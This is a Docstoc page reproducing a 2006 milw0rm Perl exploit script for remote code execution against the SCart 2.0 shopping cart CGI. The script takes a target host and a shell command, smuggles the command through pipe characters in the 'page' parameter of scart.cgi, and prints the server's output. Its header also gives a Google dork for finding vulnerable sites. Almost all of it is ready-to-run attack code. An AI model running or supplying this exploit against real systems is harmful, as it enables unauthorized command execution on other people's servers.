Docstoc

SCart 2.0 page Remote Code Execution Exploit

Document Sample
SCart 2.0 page Remote Code Execution Exploit Powered By Docstoc
					                                      SCart 2.0 page Remote Code Execution Exploit                                    Page 1/2
  1    #!/usr/bin/perl
  2    ##
  3    #     SCart 2.0 Remote Code Execution Exploit
  4    #           Bugs Found & code By K−159
  5    #
  6    ## base on advisory at http://advisories.echo.or.id/adv/adv32−K−159−2006.txt
  7    #
  8    # echo.or.id (c) 2006
  9    #
  10   ##
  11   # usage:
  12   # perl scart.pl <target> </path/> "cmd"
  13   #
  14   # Google Dork : site: scartserver.com
  15   #
  16   # Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc
  17   #
  18   # Contact: eufrato[at]gmail.com www.echo.or.id #e−c−h−o @irc.dal.net
  19   #
  20   use IO::Socket;
  21   use LWP::Simple;
  22
  23   sub Usage {
  24   print STDERR     "\n ========================================================= \r\n";
  25   print STDERR     "    *SCart 2.0 Remote Code Execution Exploit* \r\n";
  26   print STDERR     "         Bugs Found by K−159 \r\n";
  27   print STDERR     "     www.echo.or.id #e−c−h−o irc.dal.net \r\n";
  28   print STDERR     "     Usage: $0 <www.target.com> </path/> \"cmd\" \r\n";
  29   print STDERR     "============================================================= \r\n";
  30   exit;
  31   }
  32
  33   if (@ARGV < 3)
  34   {
  35     Usage();
  36   }
  37
  38
  39   $host = @ARGV[0];
  40   $path = @ARGV[1];
  41   $command = @ARGV[2];
  42
  43   print "\n[+] Conecting to $host\n";
  44
  45   my $result = get("http://$host$path/scart.cgi?action=show_page&base= base2.html&page=browse.txt|$command|");
  46
  47   if (defined $result) {
  48   print $result;
  49   }
  50   else {
  51   print "Exploit Failed.\n";
  52   }
K−159                                                                                                                 06/04/2006
                               SCart 2.0 page Remote Code Execution Exploit   Page 2/2
  53
  54   # milw0rm.com [2006−06−04]




K−159                                                                         06/04/2006

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:52
posted:5/24/2010
language:English
pages:2